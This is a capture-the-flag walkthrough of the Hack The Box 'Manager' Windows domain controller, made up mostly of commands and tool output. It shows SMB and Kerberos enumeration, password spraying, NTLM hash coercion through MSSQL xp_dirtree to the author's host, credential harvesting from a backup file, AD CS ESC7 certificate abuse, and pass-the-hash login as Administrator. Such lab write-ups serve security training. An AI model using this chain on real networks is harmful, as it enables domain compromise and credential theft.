HTB | Manager
Machine - https://app.hackthebox.com/machines/Manager
IP - 10.10.11.236
NMAP
└─$ nmap -sC -sV -p 53,80,88,135,139,389,445,464,593,636,1433,3268,3269,5985,9389,49667,49689,49690,49693,49722,49795,49865 10.10.11.236 -Pn -oA nmap_port_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-08-12 18:40 IST
Nmap scan report for 10.10.11.236
Host is up (0.55s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Manager
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-08-12 20:11:09Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after: 2122-07-27T10:31:04
|_ssl-date: 2025-08-12T20:12:52+00:00; +7h00m05s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after: 2122-07-27T10:31:04
|_ssl-date: 2025-08-12T20:12:51+00:00; +7h00m05s from scanner time.
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info:
| 10.10.11.236:1433:
| Target_Name: MANAGER
| NetBIOS_Domain_Name: MANAGER
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: manager.htb
| DNS_Computer_Name: dc01.manager.htb
| DNS_Tree_Name: manager.htb
|_ Product_Version: 10.0.17763
|_ssl-date: 2025-08-12T20:12:52+00:00; +7h00m04s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2025-08-12T19:49:44
|_Not valid after: 2055-08-12T19:49:44
| ms-sql-info:
| 10.10.11.236:1433:
| Version:
| name: Microsoft SQL Server 2019 RTM
| number: 15.00.2000.00
| Product: Microsoft SQL Server 2019
| Service pack level: RTM
| Post-SP patches applied: false
|_ TCP port: 1433
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-12T20:12:52+00:00; +7h00m05s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after: 2122-07-27T10:31:04
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: manager.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-08-12T20:12:51+00:00; +7h00m05s from scanner time.
| ssl-cert: Subject:
| Subject Alternative Name: DNS:dc01.manager.htb
| Not valid before: 2024-08-30T17:08:51
|_Not valid after: 2122-07-27T10:31:04
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49667/tcp open msrpc Microsoft Windows RPC
49689/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49690/tcp open msrpc Microsoft Windows RPC
49693/tcp open msrpc Microsoft Windows RPC
49722/tcp open msrpc Microsoft Windows RPC
49795/tcp open msrpc Microsoft Windows RPC
49865/tcp filtered unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-08-12T20:12:17
|_ start_date: N/A
|_clock-skew: mean: 7h00m04s, deviation: 0s, median: 7h00m04s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 122.26 secondsPort 80
SMB
┌──(anurag㉿anurag)-[~/htb/Manager/nmap]
└─$ netexec smb manager.htb -u '' -p ''
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\\:
┌──(anurag㉿anurag)-[~/htb/Manager/nmap]
└─$ netexec smb manager.htb -u '' -p '' --shares
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\\:
SMB 10.10.11.236 445 DC01 [-] Error enumerating shares: STATUS_ACCESS_DENIEDBut I can validate via guest
└─$ netexec smb manager.htb -u 'guest' -p '' --shares
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\\guest:
SMB 10.10.11.236 445 DC01 [*] Enumerated shares
SMB 10.10.11.236 445 DC01 Share Permissions Remark
SMB 10.10.11.236 445 DC01 ----- ----------- ------
SMB 10.10.11.236 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.236 445 DC01 C$ Default share
SMB 10.10.11.236 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.236 445 DC01 NETLOGON Logon server share
SMB 10.10.11.236 445 DC01 SYSVOL Logon server share Found username via RID Brute
└─$ netexec smb manager.htb -u 'guest' -p '' --rid-brute
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\\guest:
SMB 10.10.11.236 445 DC01 498: MANAGER\\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 500: MANAGER\\Administrator (SidTypeUser)
SMB 10.10.11.236 445 DC01 501: MANAGER\\Guest (SidTypeUser)
SMB 10.10.11.236 445 DC01 502: MANAGER\\krbtgt (SidTypeUser)
SMB 10.10.11.236 445 DC01 512: MANAGER\\Domain Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 513: MANAGER\\Domain Users (SidTypeGroup)
SMB 10.10.11.236 445 DC01 514: MANAGER\\Domain Guests (SidTypeGroup)
SMB 10.10.11.236 445 DC01 515: MANAGER\\Domain Computers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 516: MANAGER\\Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 517: MANAGER\\Cert Publishers (SidTypeAlias)
SMB 10.10.11.236 445 DC01 518: MANAGER\\Schema Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 519: MANAGER\\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 520: MANAGER\\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.236 445 DC01 521: MANAGER\\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 522: MANAGER\\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 525: MANAGER\\Protected Users (SidTypeGroup)
SMB 10.10.11.236 445 DC01 526: MANAGER\\Key Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 527: MANAGER\\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 553: MANAGER\\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.236 445 DC01 571: MANAGER\\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.236 445 DC01 572: MANAGER\\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1000: MANAGER\\DC01$ (SidTypeUser)
SMB 10.10.11.236 445 DC01 1101: MANAGER\\DnsAdmins (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1102: MANAGER\\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.236 445 DC01 1103: MANAGER\\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1113: MANAGER\\Zhong (SidTypeUser)
SMB 10.10.11.236 445 DC01 1114: MANAGER\\Cheng (SidTypeUser)
SMB 10.10.11.236 445 DC01 1115: MANAGER\\Ryan (SidTypeUser)
SMB 10.10.11.236 445 DC01 1116: MANAGER\\Raven (SidTypeUser)
SMB 10.10.11.236 445 DC01 1117: MANAGER\\JinWoo (SidTypeUser)
SMB 10.10.11.236 445 DC01 1118: MANAGER\\ChinHae (SidTypeUser)
SMB 10.10.11.236 445 DC01 1119: MANAGER\\Operator (SidTypeUser)
┌──(anurag㉿anurag)-[~/htb/Manager]
└─$ netexec smb manager.htb -u 'guest' -p '' --rid-brute | grep -i 'user' | sed -E 's/.*MANAGER\\\\([^ ]+).*/\\1/'
Administrator
Guest
krbtgt
Domain
Protected
DC01$
SQLServer2005SQLBrowserUser$DC01
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
OperatorWe can validate the username
└─$ ./kerbrute userenum --dc 10.10.11.236 -d manager.htb users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \\/ ___/ __ \\/ ___/ / / / __/ _ \\
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\\___/_/ /_.___/_/ \\__,_/\\__/\\___/
Version: v1.0.3 (9dad6e1) - 08/12/25 - Ronnie Flathers @ropnop
2025/08/12 19:42:06 > Using KDC(s):
2025/08/12 19:42:06 > 10.10.11.236:88
2025/08/12 19:42:06 > [+] VALID USERNAME: Zhong@manager.htb
2025/08/12 19:42:06 > [+] VALID USERNAME: ChinHae@manager.htb
2025/08/12 19:42:06 > [+] VALID USERNAME: Ryan@manager.htb
2025/08/12 19:42:06 > [+] VALID USERNAME: Administrator@manager.htb
2025/08/12 19:42:06 > [+] VALID USERNAME: Raven@manager.htb
2025/08/12 19:42:06 > [+] VALID USERNAME: Cheng@manager.htb
2025/08/12 19:42:06 > [+] VALID USERNAME: JinWoo@manager.htb
2025/08/12 19:42:06 > [+] VALID USERNAME: DC01$@manager.htb
2025/08/12 19:42:06 > [+] VALID USERNAME: Operator@manager.htb
2025/08/12 19:42:06 > Done! Tested 10 usernames (9 valid) in 0.642 secondsWell, with a valid list of users, we can try to perform an AS-REP Roasting attack. But we found nothing
└─$ impacket-GetNPUsers 'MANAGER.HTB/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.11.236
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User Zhong doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Cheng doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Ryan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Raven doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User JinWoo doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ChinHae doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Operator doesn't have UF_DONT_REQUIRE_PREAUTH set
Foothold/Shell
Shell as Raven
Password of the operator
I can do a quick check to see if any of the usernames I’ve collected use their username as their password.
└─$ netexec smb manager.htb -u users.txt -p lower_users.txt --continue-on-success --no-brute
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [-] manager.htb\\Administrator:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\\DC01$:dc01$ STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\\Zhong:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\\Cheng:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\\Ryan:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\\Raven:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\\JinWoo:jinWoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\\ChinHae:chinHae STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [+] manager.htb\\Operator:operator Well, let’s see where we can authenticate using the open ports returned by nmap :
└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto dc01.manager.htb -d manager.htb -u Operator -p 'operator'; echo; done
LDAP 10.10.11.236 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
LDAP 10.10.11.236 389 DC01 [+] manager.htb\\Operator:operator
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\\Operator:operator
MSSQL 10.10.11.236 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.10.11.236 1433 DC01 [+] manager.htb\\Operator:operator
WINRM 10.10.11.236 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.236 5985 DC01 [-] manager.htb\\Operator:operatorBloodhound
└─$ bloodhound-python -u 'Operator' -p 'operator' -d manager.htb -ns 10.10.11.236 -c All --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: manager.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.manager.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.manager.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.manager.htb
INFO: Done in 01M 33S
INFO: Compressing output into 20250813030440_bloodhound.zipMSSQL
└─$ impacket-mssqlclient manager.htb/Operator:'operator'@10.10.11.236 -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\\Operator guest@master)> Let’s enum databases
SQL (MANAGER\\Operator guest@master)> SELECT name FROM master..sysdatabases;
name
------
master
tempdb
model
msdb
SQL (MANAGER\\Operator guest@master)>All four are default MSSQL databases. xp_cmd is disabel but xp_dir is not
SQL (MANAGER\\Operator guest@master)> xp_cmdshell whoami
ERROR(DC01\\SQLEXPRESS): Line 1: The EXECUTE permission was denied on the object 'xp_cmdshell', database 'mssqlsystemresource', schema 'sys'.
SQL (MANAGER\\Operator guest@master)> xp_dirtree C:\\
subdirectory depth file
------------------------- ----- ----
$Recycle.Bin 1 0
Documents and Settings 1 0
inetpub 1 0
PerfLogs 1 0
Program Files 1 0
Program Files (x86) 1 0
ProgramData 1 0
Recovery 1 0
SQL2019 1 0
System Volume Information 1 0
Users 1 0
Windows 1 0
SQL (MANAGER\\Operator guest@master)> We can try to catch NTLM via Responder
SQL (MANAGER\\Operator guest@master)> xp_dirtree \\\\10.10.16.7\\test
subdirectory depth file
------------ ----- ----
SQL (MANAGER\\Operator guest@master)> [SMB] NTLMv2-SSP Client : 10.10.11.236
[SMB] NTLMv2-SSP Username : MANAGER\\DC01$
[SMB] NTLMv2-SSP Hash : DC01$::MANAGER:88d1619622c7a870:C312956F03ACD2CC3E1374EDD11BC718:010100000000000080869658020CDC01435F5CD3D0EFE97F0000000002000800430033003400310001001E00570049004E002D00440037005100370033004E004100490036004400320004003400570049004E002D00440037005100370033004E00410049003600440032002E0043003300340031002E004C004F00430041004C000300140043003300340031002E004C004F00430041004C000500140043003300340031002E004C004F00430041004C000700080080869658020CDC01060004000200000008003000300000000000000000000000003000006F6F1816302A91BC1DA517B955C1C4A1927B56E4B7B65B32D46FBA23628A583E0A0010000000000000000000000000000000000009001E0063006900660073002F00310030002E00310030002E00310036002E0037000000000000000000 Not able to crack it
Raven’s cred
We found an old zip file
SQL (MANAGER\\Operator guest@master)> xp_dirtree C:\\inetpub\\wwwroot
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1
SQL (MANAGER\\Operator guest@master)> Since it is in the root folder, we can wget it
└─$ wget <http://10.10.11.236/website-backup-27-07-23-old.zip>
--2025-08-13 03:32:58-- <http://10.10.11.236/website-backup-27-07-23-old.zip>
Connecting to 10.10.11.236:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1045328 (1021K) [application/x-zip-compressed]
Saving to: ‘website-backup-27-07-23-old.zip’
website-backup-27-07-23-old.zip 100%[=================================================================================================================================================================>] 1021K 360KB/s in 2.8s
2025-08-13 03:33:01 (360 KB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328]in .old-conf.xml file we fund raven’s cred
└─$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="<http://www.w3.org/2001/XMLSchema-instance>">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>Let’s check what permission we have with new creds
└─$ for proto in {ldap,smb,mssql,winrm}; do nxc $proto dc01.manager.htb -d manager.htb -u raven -p 'R4v3nBe5tD3veloP3r!123'; echo; done
LDAP 10.10.11.236 389 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
LDAP 10.10.11.236 389 DC01 [+] manager.htb\\raven:R4v3nBe5tD3veloP3r!123
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\\raven:R4v3nBe5tD3veloP3r!123
MSSQL 10.10.11.236 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.10.11.236 1433 DC01 [+] manager.htb\\raven:R4v3nBe5tD3veloP3r!123
WINRM 10.10.11.236 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.236 5985 DC01 [+] manager.htb\\raven:R4v3nBe5tD3veloP3r!123 (Pwn3d!)found user.txt
*Evil-WinRM* PS C:\\Users\\Raven\\Desktop> dir
Directory: C:\\Users\\Raven\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/12/2025 12:50 PM 34 user.txt
Privilege Escalation
Shell as Administrator
ADCS — ESC 7
└─$ certipy find -u raven -p 'R4v3nBe5tD3veloP3r!123' -target 10.10.11.236 -text -stdout -vulnerable
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'manager-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'manager-DC01-CA'
[*] Checking web enrollment for CA 'manager-DC01-CA' @ 'dc01.manager.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : MANAGER.HTB\\Administrators
Access Rights
Enroll : MANAGER.HTB\\Operator
MANAGER.HTB\\Authenticated Users
MANAGER.HTB\\Raven
ManageCa : MANAGER.HTB\\Administrators
MANAGER.HTB\\Domain Admins
MANAGER.HTB\\Enterprise Admins
MANAGER.HTB\\Raven
ManageCertificates : MANAGER.HTB\\Administrators
MANAGER.HTB\\Domain Admins
MANAGER.HTB\\Enterprise Admins
[+] User Enrollable Principals : MANAGER.HTB\\Authenticated Users
MANAGER.HTB\\Raven
[+] User ACL Principals : MANAGER.HTB\\Raven
[!] Vulnerabilities
ESC7 : User has dangerous permissions.
Certificate Templates : [!] Could not find any certificate templatesESC7 addresses vulnerabilities arising from an attacker obtaining highly privileged permissions directly on a CA object within AD CS or on the CA service itself. These permissions grant significant control over the CA's operations and security.
The two primary permissions of concern are:
Manage CA(CA Administrator/ManageCa): This permission grants extensive control over the CA, including the ability to modify its configuration (e.g., which certificate templates are published), assign CA roles (including Certificate Manager/Officer, if needed), start/stop the CA service, and manage CA security. This is the core permission that ESC7 often revolves around.Manage Certificates(Certificate Manager/Officer): This permission allows a user to approve or deny pending certificate requests and to revoke issued certificates.
Step 1: (If needed, as facilitated by Manage CA) Ensure capability to approve requests.
└─$ certipy ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.10.11.236' -ca 'manager-DC01-CA' -add-officer 'raven'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'This command uses the Manage CA privilege to add 'attacker' to the officer role.
Step 2: (If needed) Ensure the SubCA template is enabled on the CA.
└─$ certipy ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.10.11.236' -ca 'manager-DC01-CA' -enable-template 'SubCA'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'This command uses Manage CA to make the SubCA template available for requests.
Step 3: Submit a certificate request using the SubCA template (expected to fail initially if no direct enrollment rights).
└─$ certipy req -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.10.11.236' -ca 'manager-DC01-CA' -template 'SubCA' -upn 'administrator@manager.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 20
[-] Got error while requesting certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
Would you like to save the private key? (y/N): y
[*] Saving private key to '20.key'
[*] Wrote private key to '20.key'
[-] Failed to request certificateWe got the error but Note the Request ID (e.g., 1) and that the private key was saved (e.g., to 1.key).
Step 4: Approve the pending request.
└─$ certipy ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.10.11.236' -ca 'manager-DC01-CA' -issue-request '20'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate request ID 20Step 5: Retrieve the issued certificate
└─$ certipy req -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.10.11.236' -ca 'manager-DC01-CA' -retrieve '20'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Retrieving certificate with ID 20
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate has no object SID
[*] Loaded private key from '20.key'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'The attacker now possesses administrator.pfx, a certificate for the Administrator account. This can be used with certipy auth -pfx administrator.pfx ... to authenticate and gain privileged access.
Now we can get the hash
└─$ certipy auth -dc-ip '10.10.11.236' -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb'
Certipy v5.0.3 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@manager.htb'
[*] Using principal: 'administrator@manager.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924efSince we have the hash we can get the shell and root.txt
└─$ evil-winrm -i manager.htb -u administrator -H ae5064c2f62317332c88629e025924ef
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: <https://github.com/Hackplayers/evil-winrm#Remote-path-completion>
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\\Users\\Administrator\\Documents> cd ..\\Desktop
*Evil-WinRM* PS C:\\Users\\Administrator\\Desktop> dir
Directory: C:\\Users\\Administrator\\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 8/12/2025 12:50 PM 34 root.txt
Last updated